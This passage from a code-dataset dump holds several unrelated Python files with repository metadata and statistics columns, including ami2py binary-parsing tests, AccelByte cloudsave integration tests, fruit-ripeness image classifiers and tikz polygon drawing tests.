] | null | null | null |
debarcer/src/edit_distance.py
|
bgfritz1/debarcer_tobias
|
5c99abcee72f4605610473da0a56632d4fe824d3
|
[
"MIT"
] | null | null | null |
debarcer/src/edit_distance.py
|
bgfritz1/debarcer_tobias
|
5c99abcee72f4605610473da0a56632d4fe824d3
|
[
"MIT"
] | null | null | null |
def edit_distance(a, b):
    """Return the Hamming distance between two equal-length strings.

    Counts the positions at which the corresponding characters of ``a``
    and ``b`` differ.

    NOTE: if the inputs have different lengths, ``zip`` silently
    truncates the comparison to the shorter string — trailing excess in
    the longer input is ignored, not counted.  The original docstring
    omitted this caveat; callers should pass equal-length strings.
    """
    return sum(char_a != char_b for char_a, char_b in zip(a, b))
| 40.75
| 72
| 0.705521
| 28
| 163
| 3.928571
| 0.607143
| 0.218182
| 0.236364
| 0.254545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177914
| 163
| 4
| 72
| 40.75
| 0.820896
| 0.331288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
3bda8126a849871fd59f6d62cfd06797c445e1f2
| 9,840
|
py
|
Python
|
tests/test_basic_read.py
|
raaghulr/ami2py
|
a8ba8e83f91760e8ec6c3337199eef9800a80547
|
[
"MIT"
] | 10
|
2020-04-30T03:22:57.000Z
|
2021-09-07T09:33:20.000Z
|
tests/test_basic_read.py
|
raaghulr/ami2py
|
a8ba8e83f91760e8ec6c3337199eef9800a80547
|
[
"MIT"
] | 4
|
2020-09-17T01:21:53.000Z
|
2022-03-27T01:49:11.000Z
|
tests/test_basic_read.py
|
raaghulr/ami2py
|
a8ba8e83f91760e8ec6c3337199eef9800a80547
|
[
"MIT"
] | 4
|
2020-04-07T11:47:05.000Z
|
2021-12-28T16:17:28.000Z
|
from ami2py import AmiReader
from ami2py.ami_construct import Master, SymbolConstruct,SymbolHeader
from ami2py.consts import DATEPACKED, OPEN
import time
import os
from ami2py.ami_symbol_facade import AmiSymbolDataFacade
def test_symbol_header():
test_data_folder = os.path.dirname(__file__)
header_data_path = os.path.join(test_data_folder, "./HeaderData/3DA.AX")
f = open(header_data_path, "rb")
binfile = f.read()
f.close()
defheader=b'BROKDAt5SPCE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x80?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0
0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\x02\x00\x00'
data_parsed=SymbolHeader.parse(defheader)
assert data_parsed["Length"]==600
data_parsed=SymbolHeader.parse(binfile)
assert data_parsed["Ex-Dividend Date"]["Year"] == 2000
assert data_parsed["Ex-Dividend Date"]["Day"] == 1
assert data_parsed["Ex-Dividend Date"]["Month"] == 2
assert True
def test_load_pandas():
    """Parse the SPCE fixture with SymbolConstruct and check the entry count.

    Bug fix: the fixture file was opened without ever being closed; a
    ``with`` block now releases the handle even if parsing raises.
    """
    test_data_folder = os.path.dirname(__file__)
    test_data_file = os.path.join(test_data_folder, "./TestData/s/SPCE")
    with open(test_data_file, "rb") as f:
        binfile = f.read()
    # Timing scaffolding retained from the original; the duration is never
    # asserted, it is only useful for manual inspection.
    start = time.perf_counter_ns()
    data = SymbolConstruct.parse(binfile)
    stop = time.perf_counter_ns()
    diff = stop - start  # noqa: F841 - kept for debugging
    assert len(data["Entries"]) == 600
def test_amisymbolfacade():
    """Exercise AmiSymbolDataFacade length, negative indexing and slicing.

    Bug fix: the fixture file handle was leaked; it is now closed via a
    context manager.
    """
    test_data_folder = os.path.dirname(__file__)
    test_data_file = os.path.join(test_data_folder, "./TestData/s/SPCE")
    with open(test_data_file, "rb") as f:
        binfile = f.read()
    facade = AmiSymbolDataFacade(binfile)
    assert facade.length == 600
    test = facade[-1]  # last entry must be reachable via a negative index
    # Both spellings of "last 20 entries, reversed" must agree in length.
    sliced = facade[-1 : facade.length - 21 : -1]
    assert len(sliced) == 20
    sliced = facade[-1:-21:-1]
    assert len(sliced) == 20
def test_add_to_amisymbolfacade():
    """Append the last entry again and verify the copy equals its source.

    Bug fix: the fixture file handle was leaked; it is now closed via a
    context manager.  The ten copy-pasted per-field assertions are folded
    into a single loop over the field names (same checks, same order).
    """
    test_data_folder = os.path.dirname(__file__)
    test_data_file = os.path.join(test_data_folder, "./TestData/s/SPCE")
    with open(test_data_file, "rb") as f:
        binfile = f.read()
    facade = AmiSymbolDataFacade(binfile)
    assert facade.length == 600
    test = facade[-1]
    facade += test
    assert facade.length == 601
    # The appended entry must be field-for-field identical to its source.
    for field in ("Day", "Year", "Month", "Close", "Open", "High", "Low",
                  "Volume", "AUX1", "AUX2"):
        assert facade[-1][field] == facade[-2][field]
def test_amistruct_master(master_data):
    """Parse the master-index fixture and spot-check count and first symbols."""
    master = Master.parse(master_data)
    assert master["NumSymbols"] == 5618
    symbols = master["Symbols"]
    assert symbols[0]["Symbol"] == "A"
    assert symbols[1]["Symbol"] == "AA"
def test_write_master(master_data):
    """Rename the first symbol, rebuild the binary, and round-trip it."""
    original = Master.parse(master_data)
    original["Symbols"][0]["Symbol"] = "JD"
    rebuilt = Master.parse(Master.build(original))
    assert rebuilt["Symbols"][0]["Symbol"] == "JD"
def test_read_symbol_construct(symbol_spce):
    """The first SPCE entry's packed date must decode to the year 2017."""
    parsed = SymbolConstruct.parse(symbol_spce)
    assert parsed["Entries"][0][DATEPACKED]["Year"] == 2017
def test_write_symbol_construct(symbol_spce):
    """Mutate a parsed symbol, rebuild it, and verify the round-trip.

    Fix: the original called ``SymbolConstruct.build(space)`` once on the
    unmodified struct and immediately overwrote the result — that dead
    call is removed (build's result was never used before the rebind).
    """
    space = SymbolConstruct.parse(symbol_spce)
    space["Entries"][0][DATEPACKED]["Year"] = 2016
    space["Entries"][0][OPEN] = -25
    newbin = SymbolConstruct.build(space)
    newparsed = SymbolConstruct.parse(newbin)
    assert newparsed["Entries"][0][DATEPACKED]["Year"] == 2016
    assert newparsed["Entries"][0][OPEN] == -25
def test_AmiReader():
    """Open the TestData database and spot-check symbol list and SPCE rows."""
    data_folder = os.path.join(os.path.dirname(__file__), "./TestData")
    amireader = AmiReader(data_folder)
    symbols = amireader.get_symbols()
    assert symbols[0] == "A"
    assert symbols[1] == "AA"
    spce = amireader.get_symbol_data_dictionary("SPCE")
    # First row of the SPCE series: 2017-09-29.
    assert spce["Year"][0] == 2017
    assert spce["Month"][0] == 9
    assert spce["Day"][0] == 29
def test_reader_SymbolData():
    """get_symbol_data must expose a dict form with a sizeable Close series."""
    data_folder = os.path.join(os.path.dirname(__file__), "./TestData")
    spce = AmiReader(data_folder).get_symbol_data("SPCE")
    assert len(spce.to_dict()["Close"]) > 20
# Currently the compiled is not faster for this data
# def test_AmiReader_compiled_should_faster():
# test_data_folder = os.path.dirname(__file__)
# test_data_folder = os.path.join(test_data_folder, "./TestData")
# amireader_fast = AmiReader(test_data_folder)
# amireader_slow = AmiReader(test_data_folder, use_compiled=False)
# time_fast=0
# time_slow=0
# num_runs=20
# for i in range(num_runs):
# start=time.perf_counter()
# spce = amireader_fast.get_symbol_data("SPCE")
# end=time.perf_counter()
# time_fast=time_fast+ end-start
#
# start=time.perf_counter()
# spce = amireader_slow.get_symbol_data("SPCE")
# end=time.perf_counter()
# time_slow=time_slow+ end-start
# time_slow=time_slow/num_runs
# time_fast=time_fast/num_runs
#
# assert time_slow > time_fast
| 66.040268
| 4,711
| 0.710163
| 1,856
| 9,840
| 3.674569
| 0.066272
| 1.022287
| 1.528152
| 2.032258
| 0.726979
| 0.707038
| 0.67478
| 0.670235
| 0.657625
| 0.628592
| 0
| 0.274273
| 0.091463
| 9,840
| 148
| 4,712
| 66.486486
| 0.488591
| 0.083943
| 0
| 0.330097
| 0
| 0.009709
| 0.566518
| 0.522136
| 0
| 1
| 0
| 0
| 0.330097
| 1
| 0.097087
| false
| 0
| 0.058252
| 0
| 0.15534
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
3bdd239689c59ad0c2b2fa15e6560ac52efea118
| 160
|
py
|
Python
|
core/src/wattle/core/models/py/__init__.py
|
wattlecloud/foundation-server
|
e1467d192a7729fa4f116c80dcd001bfd58662e8
|
[
"Apache-2.0"
] | null | null | null |
core/src/wattle/core/models/py/__init__.py
|
wattlecloud/foundation-server
|
e1467d192a7729fa4f116c80dcd001bfd58662e8
|
[
"Apache-2.0"
] | 1
|
2021-07-20T00:28:27.000Z
|
2021-07-20T00:28:27.000Z
|
core/src/wattle/core/models/py/__init__.py
|
wattlecloud/foundation-server
|
e1467d192a7729fa4f116c80dcd001bfd58662e8
|
[
"Apache-2.0"
] | null | null | null |
from .auth import * # noqa: F401, F403
from .common import * # noqa: F401, F403
from .s3 import * # noqa: F401, F403
from .user import * # noqa: F401, F403
| 32
| 41
| 0.65
| 24
| 160
| 4.333333
| 0.375
| 0.384615
| 0.538462
| 0.692308
| 0.634615
| 0
| 0
| 0
| 0
| 0
| 0
| 0.201613
| 0.225
| 160
| 4
| 42
| 40
| 0.637097
| 0.41875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
ce1861746b9b6bee8b14f0392e5fa609e895f1fd
| 125
|
py
|
Python
|
app/routes/__init__.py
|
shelb-doc/Py-News
|
fc74ac63ace5e5c44c7ead4afa406542de11cc16
|
[
"MIT"
] | null | null | null |
app/routes/__init__.py
|
shelb-doc/Py-News
|
fc74ac63ace5e5c44c7ead4afa406542de11cc16
|
[
"MIT"
] | 6
|
2021-04-12T16:27:34.000Z
|
2021-04-30T12:37:21.000Z
|
app/routes/__init__.py
|
shelb-doc/Py-News
|
fc74ac63ace5e5c44c7ead4afa406542de11cc16
|
[
"MIT"
] | null | null | null |
from app.routes import home
# NOTE(review): the next line immediately rebinds the name `home` to the
# blueprint, shadowing the module imported above.  The first import looks
# redundant (or is kept only for its import-time side effects) — confirm
# against callers and drop it if unused.
from .home import bp as home
from .dashboard import bp as dashboard
from .api import bp as api
| 17.857143
| 38
| 0.776
| 23
| 125
| 4.217391
| 0.391304
| 0.247423
| 0.309278
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192
| 125
| 7
| 39
| 17.857143
| 0.960396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cbfd698dd2dee124e632d6e0a7e6b62fe7eefa1e
| 3,891
|
py
|
Python
|
tests/sample_apps/how_to/_cloudsave.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
tests/sample_apps/how_to/_cloudsave.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | 1
|
2021-10-13T03:46:58.000Z
|
2021-10-13T03:46:58.000Z
|
tests/sample_apps/how_to/_cloudsave.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
from ._integration_test_case import IntegrationTestCase
from accelbyte_py_sdk.api.cloudsave.models import ModelsGameRecordRequest
class CloudSaveTestCase(IntegrationTestCase):
    """Integration tests for the cloudsave game-record-handler endpoints.

    Each test follows arrange / act / assert.  ``tearDown`` removes the
    record created under ``post_game_record_handler_key`` so individual
    tests stay independent of one another.
    """

    post_game_record_handler_key: str = "key"
    models_game_record_request: ModelsGameRecordRequest = ModelsGameRecordRequest.create(dict_={"foo": "bar"})

    def tearDown(self) -> None:
        # Best-effort cleanup: a failed delete is only logged, never raised.
        from accelbyte_py_sdk.api.cloudsave import delete_game_record_handler_v1

        _, error = delete_game_record_handler_v1(key=self.post_game_record_handler_key)
        self.log_warning(msg=f"Failed to tear down game record handler. {str(error)}", condition=error is not None)
        super().tearDown()

    def test_delete_game_record_handler_v1(self):
        from accelbyte_py_sdk.api.cloudsave import delete_game_record_handler_v1
        from accelbyte_py_sdk.api.cloudsave import post_game_record_handler_v1

        # arrange
        _, error = post_game_record_handler_v1(
            body=self.models_game_record_request,
            key=self.post_game_record_handler_key,
        )
        self.log_warning(msg=f"Failed to set up game record handler. {str(error)}", condition=error is not None)

        # act
        _, error = delete_game_record_handler_v1(key=self.post_game_record_handler_key)

        # assert
        self.assertIsNone(error, error)

    def test_get_game_record_handler_v1(self):
        from accelbyte_py_sdk.api.cloudsave import get_game_record_handler_v1
        from accelbyte_py_sdk.api.cloudsave import post_game_record_handler_v1

        # arrange
        _, error = post_game_record_handler_v1(
            body=self.models_game_record_request,
            key=self.post_game_record_handler_key,
        )
        self.log_warning(msg=f"Failed to set up game record handler. {str(error)}", condition=error is not None)

        # act
        _, error = get_game_record_handler_v1(key=self.post_game_record_handler_key)

        # assert
        self.assertIsNone(error, error)

    def test_post_game_record_handler_v1(self):
        from accelbyte_py_sdk.api.cloudsave import delete_game_record_handler_v1
        from accelbyte_py_sdk.api.cloudsave import post_game_record_handler_v1

        # arrange: start from a clean slate; a failed delete is deliberately
        # ignored (the record may simply not exist yet).
        _, _ = delete_game_record_handler_v1(key=self.post_game_record_handler_key)

        # act
        _, error = post_game_record_handler_v1(
            body=self.models_game_record_request,
            key=self.post_game_record_handler_key,
        )

        # assert
        self.assertIsNone(error, error)

    def test_put_game_record_handler_v1(self):
        from accelbyte_py_sdk.api.cloudsave import get_game_record_handler_v1
        from accelbyte_py_sdk.api.cloudsave import post_game_record_handler_v1
        from accelbyte_py_sdk.api.cloudsave import put_game_record_handler_v1
        from accelbyte_py_sdk.api.cloudsave.models import ModelsGameRecordRequest
        from accelbyte_py_sdk.api.cloudsave.models import ModelsGameRecordResponse

        # arrange
        _, error = post_game_record_handler_v1(
            body=self.models_game_record_request,
            key=self.post_game_record_handler_key,
        )
        self.log_warning(msg=f"Failed to set up game record handler. {str(error)}", condition=error is not None)

        # act: overwrite the record's value
        _, error = put_game_record_handler_v1(
            body=ModelsGameRecordRequest.create(dict_={"foo": "baz"}),
            key=self.post_game_record_handler_key,
        )

        # assert: the update succeeded and reads back with the new value
        self.assertIsNone(error, error)
        result, error = get_game_record_handler_v1(key=self.post_game_record_handler_key)
        self.assertIsNotNone(result)
        self.assertIsInstance(result, ModelsGameRecordResponse)
        self.assertIsNotNone(result.value)
        self.assertIn("foo", result.value)
        self.assertEqual("baz", result.value["foo"])
| 39.30303
| 115
| 0.713441
| 497
| 3,891
| 5.17505
| 0.124748
| 0.171073
| 0.257776
| 0.177294
| 0.821928
| 0.795101
| 0.795101
| 0.795101
| 0.778771
| 0.739891
| 0
| 0.00789
| 0.218196
| 3,891
| 98
| 116
| 39.704082
| 0.837607
| 0.019275
| 0
| 0.52381
| 0
| 0
| 0.05969
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 1
| 0.079365
| false
| 0
| 0.222222
| 0
| 0.349206
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5a42d9e8f1f674629b5751efe57ef4fa0adfa1ac
| 7,667
|
py
|
Python
|
orangelib/build/lib/orangelib/model.py
|
ayoolaolafenwa/orangelib
|
4fe7d88488482e52d466b8021db3b4e4dc80a484
|
[
"MIT"
] | 5
|
2020-06-23T11:47:35.000Z
|
2021-12-18T16:00:18.000Z
|
orangelib/build/lib/orangelib/model.py
|
ayoolaolafenwa/orangelib
|
4fe7d88488482e52d466b8021db3b4e4dc80a484
|
[
"MIT"
] | null | null | null |
orangelib/build/lib/orangelib/model.py
|
ayoolaolafenwa/orangelib
|
4fe7d88488482e52d466b8021db3b4e4dc80a484
|
[
"MIT"
] | 4
|
2020-06-23T11:51:49.000Z
|
2021-11-21T03:44:48.000Z
|
import tensorflow
from tensorflow.keras.layers import *
from tensorflow.keras.models import *
import os
from tensorflow.keras.preprocessing import image
from .net import MobileNetV2
import numpy as np
from tensorflow.keras import backend as K
class _FruitRipenessClassifier:
    """Shared implementation for the binary MobileNetV2 fruit classifiers.

    The original file repeated the same ~45-line class three times,
    differing only in ``class_map``.  The duplication is factored into
    this private base; every public subclass keeps its exact interface:
    ``__init__(model_path)``, ``preprocess_input(x)``,
    ``predict(image_path)`` and ``predictBatch(image_paths)``.
    """

    # index -> human-readable class name; overridden by each subclass.
    class_map = {}

    def __init__(self, model_path):
        """Build the two-class MobileNetV2 and load the trained weights."""
        self.model = MobileNetV2(input_shape=(224, 224, 3), num_classes=2)
        self.model.load_weights(model_path)

    def preprocess_input(self, x):
        """Scale pixel values in place from [0, 255] to [0, 1] and return x."""
        x *= (1. / 255)
        return x

    def _load_image(self, image_path):
        """Load one image file as a preprocessed (1, 224, 224, 3) array."""
        img = image.load_img(image_path, target_size=(224, 224))
        img = image.img_to_array(img, data_format="channels_last")
        img = np.expand_dims(img, axis=0)
        return self.preprocess_input(img)

    def predict(self, image_path):
        """Classify a single image.

        Returns:
            (class_name, confidence_percent) for the most likely class.
        """
        prediction = self.model.predict(self._load_image(image_path))
        predicted_class = prediction.argmax()
        prediction_confidence = prediction.max() * 100
        return self.class_map[predicted_class], prediction_confidence

    def predictBatch(self, image_paths):
        """Classify a batch of images with one forward pass.

        Returns:
            (class_names, confidences): a list of labels and the per-image
            confidence percentages, in input order.
        """
        # Stack all preprocessed images into a single (N, 224, 224, 3) batch.
        images = np.concatenate([self._load_image(p) for p in image_paths])
        predictions = self.model.predict(images)
        # axis=1: reduce over the class dimension, one result per image.
        predicted_classes = predictions.argmax(axis=1)
        prediction_confidence = predictions.max(axis=1) * 100
        predicted_class_names = [self.class_map[i] for i in predicted_classes]
        return predicted_class_names, prediction_confidence


class OrangeClassifier(_FruitRipenessClassifier):
    """Ripe vs. unripe orange classifier."""
    class_map = {0: "ripe orange", 1: "unripe orange"}


class BananaClassifier(_FruitRipenessClassifier):
    """Ripe vs. unripe banana classifier."""
    class_map = {0: "ripe banana", 1: "unripe banana"}


class AppleClassifier(_FruitRipenessClassifier):
    """Green vs. red apple classifier."""
    class_map = {0: "green apple", 1: "red apple"}
| 35.169725
| 97
| 0.663623
| 974
| 7,667
| 4.946612
| 0.101643
| 0.069738
| 0.139477
| 0.047323
| 0.935243
| 0.935243
| 0.935243
| 0.935243
| 0.935243
| 0.935243
| 0
| 0.020474
| 0.26738
| 7,667
| 217
| 98
| 35.331797
| 0.83728
| 0.154167
| 0
| 0.87931
| 0
| 0
| 0.023394
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0
| 0.068966
| 0
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ce637de6ea58bcc6eb859600dfc07d1ca4c99a0d
| 4,079
|
py
|
Python
|
test/polygon_test.py
|
TimeExceed/fathom
|
23e611213b25789f3e4931e5f3961bee7500ffa5
|
[
"BSD-3-Clause"
] | null | null | null |
test/polygon_test.py
|
TimeExceed/fathom
|
23e611213b25789f3e4931e5f3961bee7500ffa5
|
[
"BSD-3-Clause"
] | null | null | null |
test/polygon_test.py
|
TimeExceed/fathom
|
23e611213b25789f3e4931e5f3961bee7500ffa5
|
[
"BSD-3-Clause"
] | null | null | null |
import testa
from fathom import Point, ORIGIN
import fathom.tikz as tikz
import fathom.colors as colors
import fathom.line_styles as line_styles
import fathom.corner_styles as corner_styles
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\draw (0.50cm,2.00cm)--(1.50cm,2.00cm)--(1.50cm,0.00cm)--(0.50cm,0.00cm)--cycle;
\end{tikzpicture}
\end{document}
''')
def draw_rectangle():
    """A 1x2 rectangle centred at (1, 1), rendered as a closed tikz path."""
    c = tikz.Canvas()
    c.new_rectangle(center=Point(1, 1), width=1, height=2)
    return c.draw()
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\draw (0.00cm,0.00cm)--(1.00cm,2.00cm)--(2.00cm,0.00cm)--cycle;
\end{tikzpicture}
\end{document}
''')
def draw_triangle():
    """A triangle given by three explicit vertices."""
    c = tikz.Canvas()
    c.new_triangle(vertices=[ORIGIN, Point(1, 2), Point(2, 0)])
    return c.draw()
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\draw (0.00cm,0.00cm)--(1.00cm,2.00cm)--(2.00cm,0.00cm)--cycle;
\end{tikzpicture}
\end{document}
''')
def draw_polygon():
    """The same three vertices as the triangle test, via new_polygon."""
    c = tikz.Canvas()
    c.new_polygon(vertices=[ORIGIN, Point(1, 2), Point(2, 0)])
    return c.draw()
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\draw[color=red] (0.50cm,2.00cm)--(1.50cm,2.00cm)--(1.50cm,0.00cm)--(0.50cm,0.00cm)--cycle;
